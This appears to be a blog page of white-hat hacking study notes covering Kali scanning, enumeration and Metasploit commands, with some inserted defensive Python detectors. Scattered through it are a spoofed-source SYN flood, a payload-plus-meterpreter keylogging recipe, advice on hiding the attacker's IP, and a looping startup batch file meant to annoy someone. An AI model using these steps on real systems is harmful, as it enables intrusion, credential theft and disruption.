Blue Flower

Let's go and learn some tips about white-hat hacking, interesting, eh? :)

Useful extensions for your browser

Install Firebug Lite on the Chrome browser (https://chrome.google.com/webstore/detail/firebug-lite-for-google-c/ehemiojjcpldeipjhjkepfdaohajpbdo) and use it to inspect the websites you visit for vulnerabilities

  • Metasploitable; download this VM for your testing lab from here: https://www.offensive-security.com/metasploit-unleashed/requirements/ The default logon details are:
    • username: msfadmin
    • password: msfadmin
  • Most companies are running IPv6, which comes enabled by default on Microsoft OSes and most distros, and they don't even know it. Analysing/exploring a network through IPv6 is becoming popular

 

Google your "friend"

When you want to browse discreetly, use the "incognito mode" built into Chrome (while in the browser, press Ctrl+Shift+N). To customise your Google results use:

  • Searching for "cars -honda -renault" will display results without any "honda" or "renault" entries
  • Searching for "cars -honda "manual"" will display results containing the string "manual" but without any "honda" string
  • In Google.com visit Settings > Advanced Search and customise your settings in there

Explore the Google Advanced Search operators and get familiar with them: http://www.googleguide.com/print/cheatsheet.pdf

Explore www.exploit-db.com to access the Google Hacking Database (GHDB), a collection of ready-made Google queries that locate systems exposing well-known vulnerabilities

Visit https://www.google.com/alerts and set up your string alerts in there (for example "hack"), and you'll receive e-mails about what's happening on the web regarding your alert string. This is the best way of getting your news personalised! :)

Tools for Website recon

There are a few tools to gather information about a website you want to protect or target

Tools for Email recon (reconnaissance)

As you well know (or should know), e-mail uses POP3 on tcp/110 (tcp/995 encrypted), IMAP on tcp/143 (tcp/993 encrypted) and SMTP (Simple Mail Transfer Protocol) on tcp/25. Use the command below on your Kali to connect to an SMTP server; if you can connect, you can use SMTP commands to actually send an e-mail https://www.samlogic.net/articles/smtp-commands-reference.htm

telnet mydomain.com 25
   HELO test.com
   MAIL FROM:<sender@example.com>
   ;placeholder sender address
  • smtp-user-enum ;launch it in your Kali to test whether the SMTP server functions as a tarpit server https://en.wikipedia.org/wiki/Tarpit_(networking)
  • Download the official eMailTrackerPro, then paste the header of the e-mail under the "Trace Header" button, and watch the trace happen http://www.emailtrackerpro.com/
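The "Trace Header" idea above can be reproduced by hand: every mail server on the path prepends a Received: header, so reading them bottom-up gives the hop chain. The following parser is an added example (it is not code from the page or from eMailTrackerPro) and runs on a constructed three-hop message; it unfolds the headers, extracts the claimed HELO name, the reverse DNS name and IP recorded by the receiving server, orders the hops from origin to destination, and flags an origin in RFC 1918 space or a HELO name the receiver could not confirm by reverse DNS. The header names, hostnames and addresses are all constructed sample data.

```python
import ipaddress
import re

# Constructed sample e-mail (not a real message): three Received headers,
# newest on top, as mail servers prepend them.
SAMPLE_MESSAGE = (
    "Received: from mx-in.example.net (mx-in.example.net [203.0.113.10])\n"
    "\tby inbox.example.com with ESMTPS id abc123\n"
    "\tfor <victim@example.com>; Mon, 1 Jan 2018 10:05:00 +0000\n"
    "Received: from relay.example.org (unknown [198.51.100.7])\n"
    "\tby mx-in.example.net with ESMTP id def456;\n"
    "\tMon, 1 Jan 2018 10:04:30 +0000\n"
    "Received: from workstation.internal (workstation.internal [192.168.1.18])\n"
    "\tby relay.example.org with SMTP id ghi789;\n"
    "\tMon, 1 Jan 2018 10:04:00 +0000\n"
    "From: someone@example.org\n"
    "To: victim@example.com\n"
    "Subject: constructed sample\n"
    "\n"
    "body\n"
)

# "from <helo-name> (<reverse-dns> [<ip>]) ... by <receiving-server>"
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[^\]]+)\]\))?"
    r".*?\bby\s+(?P<by>\S+)"
)

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    """True when the address lies in one of the private (RFC 1918) IPv4 ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def unfold_headers(raw):
    """Return the header block as a list of unfolded 'Name: value' strings."""
    headers = []
    for line in raw.split("\n\n", 1)[0].splitlines():
        if line[:1] in (" ", "\t") and headers:   # folded continuation line
            headers[-1] += " " + line.strip()
        else:
            headers.append(line.strip())
    return headers


def trace_hops(raw):
    """Parse Received headers; return hops ordered from origin to final destination."""
    hops = []
    for header in unfold_headers(raw):
        if not header.lower().startswith("received:"):
            continue
        value = header.split(":", 1)[1].strip()
        m = RECEIVED_RE.search(value)
        if not m:
            continue
        ip, rdns, helo = m.group("ip"), m.group("rdns"), m.group("helo")
        hops.append({
            "helo": helo,
            "rdns": rdns,
            "ip": ip,
            "by": m.group("by"),
            "timestamp": value.rsplit(";", 1)[1].strip() if ";" in value else None,
            # hop was injected from inside a private network
            "private": is_rfc1918(ip) if ip else False,
            # HELO name the receiving server could not confirm by reverse DNS
            "helo_mismatch": rdns is not None and rdns != helo,
        })
    hops.reverse()   # headers are prepended, so the last one is the origin
    return hops


if __name__ == "__main__":
    for i, hop in enumerate(trace_hops(SAMPLE_MESSAGE), 1):
        print(i, hop)
```

Only the top-most Received: header (the one your own server wrote) is trustworthy; everything below it was supplied by earlier hops and can be forged, which is why the first hop's private address and the second hop's "unknown" reverse DNS are reported as observations rather than proof.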

 

 

Goodies for your Kali

If you haven't got it on your Kali VM, do apt-get install httrack as well as webhttrack; this tool will download an offline copy of whichever site you like. If you are using a Wintel station, you can get the binaries here: https://www.httrack.com/

Use the metagoofil tool on your Kali VM to download public files from the target website, like PDFs, docs, etc; do apt-get install metagoofil if you haven't got it

metagoofil -d yourdomain.com -t pdf -l 200 -n 50 -o domainFiles -f Results.html

The above will download PDF files from "yourdomain.com" and put them in a folder called domainFiles

Use the whois tool on your Kali for website recon, as well as a visit to http://whois.domaintools.com/

Using your Kali VM, fire up nslookup in interactive mode and type "set type=mx" then the target site; for a list of DNS record types visit this link: https://en.wikipedia.org/wiki/List_of_DNS_record_types

Network Scanning Practices in Kali

Use Zenmap for an intense GUI scanner; type this (including the -O) in the command line to force discovery of the target's operating system: nmap -T4 -A -v -O 192.168.1.212 ;using Zenmap you can create new profiles and select the different settings or scripts you want to use for your scan

1) Open nmap on your Kali system and issue this command to scan your local subnet:

nmap -sn 192.168.0.0/24
nmap -O 192.168.1.120
  ;the above with "-O" will try to detect the OS of the target

Typically, you'd use a chain of encrypted proxy servers (A to B to C, etc) to launch this type of scan so that you're not directly detected, as you'd hide your source IP address

2) Open Wireshark and start capturing traffic, then issue this command to send traffic to the target host

nmap -sX 192.168.1.147

Filter the results with the IP of your Kali (e.g. "ip.addr==192.168.1.18") and you'll see the TCP flags: SYN requests, SYN ACK, FIN and URG
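What you see in Wireshark during the Xmas scan above is also what a detector looks for on the defending side: segments carrying FIN, PSH and URG together (or no flags at all) that never belong to a normal TCP handshake, spread over many ports of one host. The detector below is an added example, not code from the page; it classifies the flag byte of each segment and raises an alert when one source sends null, Xmas or FIN probes to at least five distinct ports of one destination. The packet records are constructed sample data (source, destination, destination port, flags byte), standing in for what you would pull out of a capture.

```python
from collections import defaultdict

# TCP flag bits as they appear in the header's flags byte.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_flags(flags):
    """Name the probe type a bare TCP segment with these flags corresponds to."""
    if flags == 0:
        return "null"                 # nmap -sN: no flags at all
    if flags == FIN | PSH | URG:
        return "xmas"                 # nmap -sX: "lit up like a Christmas tree"
    if flags == FIN:
        return "fin"                  # nmap -sF
    if flags == SYN:
        return "syn"                  # ordinary connection attempt (or -sS)
    return "other"                    # SYN/ACK, ACK, PSH/ACK, RST ... normal traffic


# Constructed packet records (src, dst, dport, flags); not a real capture.
PACKETS = (
    # Xmas probes from .18 against eight ports on .147
    [("192.168.1.18", "192.168.1.147", p, FIN | PSH | URG)
     for p in (21, 22, 23, 25, 80, 110, 143, 443)]
    # a normal web session from .50: handshake plus a data segment
    + [("192.168.1.50", "192.168.1.147", 80, SYN),
       ("192.168.1.147", "192.168.1.50", 80, SYN | ACK),
       ("192.168.1.50", "192.168.1.147", 80, ACK),
       ("192.168.1.50", "192.168.1.147", 80, PSH | ACK)]
    # a single stray NULL segment: below the alert threshold
    + [("192.168.1.60", "192.168.1.147", 22, 0)]
)


def detect_scans(packets, min_ports=5):
    """Alert when one source sends null/xmas/fin probes to >= min_ports ports of one host."""
    ports_seen = defaultdict(set)
    for src, dst, dport, flags in packets:
        kind = classify_flags(flags)
        if kind in ("null", "xmas", "fin"):
            ports_seen[(src, dst, kind)].add(dport)
    alerts = []
    for (src, dst, kind), ports in sorted(ports_seen.items()):
        if len(ports) >= min_ports:
            alerts.append({"src": src, "dst": dst, "scan": kind,
                           "ports": sorted(ports)})
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(PACKETS):
        print(f"{alert['scan']} scan from {alert['src']} against {alert['dst']}: "
              f"{len(alert['ports'])} ports")
```

The equivalent Wireshark display filters are "tcp.flags.fin==1 && tcp.flags.push==1 && tcp.flags.urg==1" for the Xmas probes and "tcp.flags==0x000" for NULL probes; the threshold on distinct ports is what separates a scan from an occasional malformed segment.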

3) Idle scan (stealthy). This works as follows:

  1. From your IP (.18) you send a TCP SYN/ACK to a zombie host (not the intended target), let's say with IP .216
  2. The zombie replies to you with an RST (e.g. ID 339), which includes the zombie's fragment (IP) ID
  3. Knowing this fragment ID, we initiate a TCP SYN towards the target IP .212
  4. The target will naturally respond to the zombie, and we observe the zombie's ID sequence to see if any ports are open

In practice this works like this:

nmap -sn 192.168.1.0/24
 ;to find out what is up
nmap -Pn -sI 192.168.1.216 192.168.1.212
 ;use "-sI" for an idle scan from the zombie (.216) to the target (.212)
nmap -Pn -sI 192.168.1.216 -p50-200 --packet-trace 192.168.1.212
 ;same as above but will scan ports 50 to 200 only, and will display the live interaction
nmap --top-ports 20 192.168.1.120
 ;scans the 20 most popular ports that are likely to be open; the "-F" switch instead means the 100 most popular ports
nmap -sS 192.168.1.0/24 -D 192.168.1.15,192.168.1.25
  ;switch -D for decoy: the above will start the scan from your Kali's IP as well as from .15 and .25, hence confusing the network admin
nmap --iflist
  ;list your net interfaces
nmap -A -T4 192.168.1.120
  ;switch -A (aggressive) turns on OS detection, version detection, script scanning and traceroute

nmap scripting ;be careful when using scripts, as they might bring down a remote device; to find out the groups of scripts you have with nmap go ahead and run nmap --script-help discovery ;note that the group "safe" doesn't necessarily mean that those scripts are safe to run!

nmap --script=default 192.168.1.120
nmap -sC 192.168.1.120
  ;both commands are the same
nmap --script "safe or default" 192.168.1.120
  ;will run scripts in both groups 'safe' and 'default'

Telnet practices in Kali

Once you know the well-known port (WKP) 80 is open on a computer, you can use telnet to get further info using this:

telnet 192.168.1.212 80
 ;the result "Escape character is '^]'." means you are connected
GET / HTTP/1.0
 ;the GET request shows you the version of Apache/IIS running (in the Server response header)

The command nc (netcat) would do the same as telnet

Scapy

Based on Python, Scapy is a packet manipulation tool that allows you to capture, craft, replay and reply to any type of packet you need; craft your own packets and keep probing the target server until you find a vulnerability. There are so many possibilities with Scapy, such a powerful tool it is, and to get the most out of it you need to learn Python, but here are some commands (typed at the scapy prompt, which imports everything for you; in a plain Python shell run "from scapy.all import *" first):

Declare your variables in Scapy
>>> L2=Ether()
>>> L3=IP()
>>> L4=TCP()

To see the Scapy default values for Ether, IP and TCP use:
>>> L2.show()
>>> L4.show()

Set the L3 variable to your specified values
>>> L3=IP(ttl=99, dst="192.168.1.120")

>>> sendp(L2/L3/L4) ;this will send the packet at layer 2 (with the Ethernet header you built)
>>> sniff(iface="eth0", prn=lambda x:x.show()) ;sniff the traffic in your Kali and print every packet
>>> sniff(filter="host 192.168.1.120", count=5) ;BPF filter: capture only 5 packets to/from that host

Hping3 ;if ICMP is blocked, you can use hping3 ;this program is also scriptable and you can interact with it by entering hping3 (Ctrl+D to exit)

hping3 -S www.mysite.com -p 80 -c 5
  ;send a TCP SYN to port 80 five times (-c 5); the result is similar to ping but no ICMP packets are involved :)
hping3 -1 192.168.1.x --rand-dest -I eth0
  ;ICMP mode (-1) towards random destinations (the "x" octet is randomised) out of eth0
hping3 -8 50-56 -S www.mydomain.com
  ;scan mode (-8) with SYN against ports 50 to 56
hping3 -S 192.168.1.1 -a 192.168.1.23 -p 22 --flood
  ;the above floods the SSH port of device .1 (router) using the decoy .23 as spoofed source (-a)
  ;if this attack is run against a Cisco device, use these to verify:
       "show control-plane host open-ports"
       "show processes cpu sorted"

hping3 -S www.domain.com -p 80 -T --ttl 13 --tr-keep-ttl -n

The above uses -T (traceroute mode), with no name resolution (-n), keeps probing hop 13 only (--tr-keep-ttl) and loops; see if hop 13 changes its IP address, which would mean it is part of a load balancer

Vulnerability Scanner

Go and get the free version of Nessus from Tenable and install it on your Kali https://www.tenable.com/downloads/nessus ;you'll be able to scan up to 16 IP addresses for vulnerabilities free of charge

Download a 15-day trial of SolarWinds Network Topology Mapper (NTM) to get a better insight into how the systems are interconnected https://www.solarwinds.com/network-topology-mapper  Just note that Zenmap (in your Kali) can also create a topology map for you free of charge :)

IPv6 in Kali

If not configured, add an IPv6 address with: ifconfig eth0 add 2001:ab8:1783:1::2/64

Metasploit

This great tool can be used for many things; let's explore a few. To open it go to Applications > Exploitation Tools > Metasploit

search snmp  ;see what's available in regards to SNMP
use auxiliary/scanner/snmp/snmp_enum  ;configure metasploit to use this module
show options  ;shows you the settings of the module you're using
set RHOSTS 192.168.1.120   ;sets the variable RHOSTS to the target IP address
run  ;launches the module (the "attack")

 

ntpdate ;get it on your Kali to launch queries against targets using udp/123 for NTP

apt-get install ntpdate

setoolkit ;use it to create payloads and trojans; launch it in your Kali and use option 1 (Social Engineering Attack) > 9 (Powershell Attack Vectors) > 1 (Powershell Alphanumeric Shellcode Injector) to create a .bat file that you can run on a Windows test computer to infect it. Once the machine is infected, open metasploit and use these commands:

To use in metasploit
 sessions -l  ;lists infected PCs reporting to Kali
 sessions -i 10 ;interacts with session 10
 meterpreter> help ;type help for a suite of handy commands
 meterpreter> keyscan_start ;start capturing keystrokes on the affected machine
 meterpreter> keyscan_dump  ;shows you the keys -passwords- that have been entered

Goodies for your Windows OS

Download ID Serve from here https://www.grc.com/id/idserve.htm to find out what type of web server (IIS, Apache, etc) a particular site is running

NetBios suffixes

Using nmap -O you can discover whether a target has port tcp/139 (netbios-ssn) open; if it does, you can use the nbtstat command within Windows to discover the MAC address of the target machine, together with the NetBIOS suffixes, which will help you identify which services the remote Windows target is running http://www.pyeung.com/pages/microsoft/winnt/netbioscodes.html

nbtstat -A 192.168.1.120
net view \\192.168.1.120

Download the nbtenum (netbios enumeration) binary from here: http://nbtenum.sourceforge.net/ and go ahead and scan your subnet

SNMP Enumeration

Get it in your head: SNMP versions 1 and 2c are insecure as they always send the community string (the password) in clear text, so just by sniffing the traffic you'd be able to learn it. Switch to v3 right now and stop using ACLs to "protect" v1/2c; their traffic is never encrypted, unlike version 3 which can be authenticated and encrypted.
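To see why the paragraph above matters, it helps to look at the bytes: an SNMPv1 or v2c message is a BER SEQUENCE whose second element is the community string as a plain OCTET STRING, so anyone on the path reads it with a twenty-line parser. The code below is an added example, not code from the page or from any SNMP tool: it builds constructed v1 and v2c GetRequest datagrams (sysDescr, OID 1.3.6.1.2.1.1.1.0) plus a minimal v3 message header, then audits a list of (source, destination, payload) records and reports every datagram whose community string is readable. The community strings, addresses and the v3 scoped-PDU placeholder are all constructed sample values.

```python
# ASN.1 BER tags used by SNMP
SEQUENCE, INTEGER, OCTET_STRING, NULL, OID = 0x30, 0x02, 0x04, 0x05, 0x06
GET_REQUEST = 0xA0

SYS_DESCR = bytes.fromhex("2b06010201010100")   # OID 1.3.6.1.2.1.1.1.0


def tlv(tag, payload):
    """Encode one short-form BER element (payload shorter than 128 bytes)."""
    assert len(payload) < 128
    return bytes([tag, len(payload)]) + payload


def read_tlv(buf, pos):
    """Decode one BER element at pos; returns (tag, payload, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_get_request(version, community, oid=SYS_DESCR):
    """Constructed SNMPv1 (version=0) or v2c (version=1) GetRequest datagram."""
    varbinds = tlv(SEQUENCE, tlv(SEQUENCE, tlv(OID, oid) + tlv(NULL, b"")))
    pdu = tlv(GET_REQUEST,
              tlv(INTEGER, b"\x01")         # request-id
              + tlv(INTEGER, b"\x00")       # error-status
              + tlv(INTEGER, b"\x00")       # error-index
              + varbinds)
    return tlv(SEQUENCE,
               tlv(INTEGER, bytes([version]))
               + tlv(OCTET_STRING, community.encode())   # the "password", in the clear
               + pdu)


def build_v3_stub():
    """Constructed SNMPv3 message header; the scoped PDU is a placeholder for the encrypted body."""
    global_data = tlv(SEQUENCE,
                      tlv(INTEGER, b"\x01")             # msgID
                      + tlv(INTEGER, b"\x04\x00")       # msgMaxSize 1024
                      + tlv(OCTET_STRING, b"\x07")      # msgFlags: auth + priv + reportable
                      + tlv(INTEGER, b"\x03"))          # msgSecurityModel: USM
    return tlv(SEQUENCE,
               tlv(INTEGER, b"\x03")
               + global_data
               + tlv(OCTET_STRING, b"")                 # msgSecurityParameters (omitted here)
               + tlv(OCTET_STRING, b"\x00" * 8))        # encrypted scoped PDU placeholder


def snmp_community(datagram):
    """Return (version name, cleartext community or None) for one SNMP datagram."""
    tag, body, _ = read_tlv(datagram, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    vtag, vval, pos = read_tlv(body, 0)
    if vtag != INTEGER:
        raise ValueError("missing version field")
    version = int.from_bytes(vval, "big")
    name = {0: "v1", 1: "v2c", 3: "v3"}.get(version, "unknown")
    if version in (0, 1):
        _, cval, _ = read_tlv(body, pos)
        return name, cval.decode("ascii", "replace")
    return name, None              # v3: no community; USM credentials are not sent in the clear


def audit(datagrams):
    """Flag every v1/v2c datagram, whose community string any sniffer on the path can read."""
    findings = []
    for src, dst, payload in datagrams:
        version, community = snmp_community(payload)
        if community is not None:
            findings.append((src, dst, version, community))
    return findings


# Constructed sample traffic (src, dst, UDP payload); not a real capture.
SAMPLE_TRAFFIC = [
    ("192.168.1.18", "192.168.1.1", build_get_request(0, "public")),
    ("192.168.1.18", "192.168.1.120", build_get_request(1, "private")),
    ("192.168.1.18", "192.168.1.120", build_v3_stub()),
]

if __name__ == "__main__":
    for src, dst, version, community in audit(SAMPLE_TRAFFIC):
        print(f"{src} -> {dst}: SNMP{version} community '{community}' sent in clear text")
```

Running the audit over a real capture of udp/161 payloads gives an inventory of every device still polled with v1/v2c and the exact community strings exposed, which is the list you need when migrating the pollers to v3.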

Download the snmputil.exe tool from here: http://dennisbareis.com/scriptingtipsandtricks/snmputil_exe.htm and see here how Microsoft advise you to use it: https://support.microsoft.com/en-hk/help/323340/how-to-use-the-snmputil-exe-tool-to-verify-the-microsoft-snmp-agent-co 

Another good one is SNScan from Foundstone (now McAfee); search the web and "download" it from a bay like an old pirate if you can find it, but be careful and ensure you don't drink too much rum! :) http://learningpcs.blogspot.com/2010/09/utility-snscan.html

Solarwinds can also do the same job of scanning SNMP devices on your network

JXplorer ;for LDAP enumeration against AD on port 389; download this tool http://jxplorer.org/ and log on to the target domain with a simple user account; you'll see that all of the OUs and accounts in the target domain are populated in the search result

Get "sigverif" and "FCIV" to check file and system integrity; on Windows 10 you can run sfc /scannow (sfc = System File Checker)

Process Monitor and Registry utilities

Download process monitor and other chaps from here: https://docs.microsoft.com/en-us/sysinternals/downloads/process-utilities  

Download the jv16 Power Tools from here: https://www.macecraft.com/download/  

Download Driver View from here: https://www.nirsoft.net/utils/driverview.html

Download Windows Service Manager from sysprogs from here: http://sysprogs.com/legacy/tools/srvman/ 

Download Security Autorun from http://tcpmonitor.altervista.org ;you can check your registry and startup items for malicious entries

EC-Council

With the resources at EC-Council, either create your own lab (recommended, using VMware Workstation) or use the https://ilabs.eccouncil.org/ 

 

Theory

InfoSec concepts of security in regard to data are Confidentiality, Integrity and Availability (C.I.A.)

APTs (Advanced Persistent Threats) are very sophisticated forms of code, like the Stuxnet worm

There are 5 basic phases in hacking:

  1. Reconnaissance; gathering information about the target before the attack. It is passive reconnaissance if you google the company, research it, etc, while active reconnaissance is when you make calls to gather info, infiltrate physically as a visitor to see their systems, etc
  2. Scanning; vulnerability and port scanning to gather more technical information about their devices
  3. Gaining Access; once you're in on a device, try to escalate your privileges to get additional access
    1. Escalating privileges; the step of raising your access higher
  4. Maintaining Access; ensure you have the same access when you return, which can be achieved by installing a rootkit, trojan, backdoor, etc
    1. Executing Applications; that's the whole idea behind the hacking anyway
  5. Clearing Tracks; clear logs, activities and events that may disclose that you were on the network
    1. Hiding Files (or, of course, deleting them)

Steganography ;the process of hiding your message within another message

Getting information from a user is a lot easier than breaking into a system

Trojan ;a piece of software installed on a computer that checks for a specific pattern, like "credit card", and sends the details to a hacker using HTTP, FTP or other protocols. With HTTP RAT (Remote Access Tool) you can actually create an executable that will install the other executable (trojan) that you like; in this case the "HTTP RAT" will list the whole of your PC under http://yourIPaddress, scary how easy it is!

Proxy chaining; the process by which hackers connect 1, 2, 3, 4 or more proxies to hide their real source IP address in an attack. On your Windows lab machine install Proxy Workbench; if you can't find it see similar sites here: https://en.freedownloadmanager.org/Windows-PC/Proxy-Workbench.html#related

Also on your lab, download Proxy Switcher from here: https://proxyswitcher.com/ and use it to hide your IP address; worth paying for this application just to browse the web in total anonymity. Remember! Do all this stuff only in your lab-controlled-by-you-only environment!

Shellshock ;a vulnerability found in 2014 in Linux servers running Apache with CGI (Common Gateway Interface); this is a bug in the bash shell that allows remote code to be executed

bash --version  ;discover what bash version you're running
nmap -sV -p- --script http-shellshock 192.168.1.120
  ;the above will probe .120 on all ports (-p-) for the Shellshock vulnerability

 

Miscellaneous

BackTrack is the name Kali used to have back in 2013 https://www.backtrack-linux.org/

To annoy somebody's computer, create this batch file (.bat) and place it in the startup items; it will loop endlessly!

@echo off
:LoopStart
start
start www.google.com
goto :LoopStart

Try "TeraBIT Virus Maker" to create a test virus, but be careful to download a virus-free version!

https://www.hackthissite.org/

 

www.anywho.com

www.netcraft.com ;use Monster for an insight into a company's network systems if the company is hiring someone

www.kali.org to get the Kali VM for VMware Workstation

Google Hacking Database can be explored at www.exploit-db.com
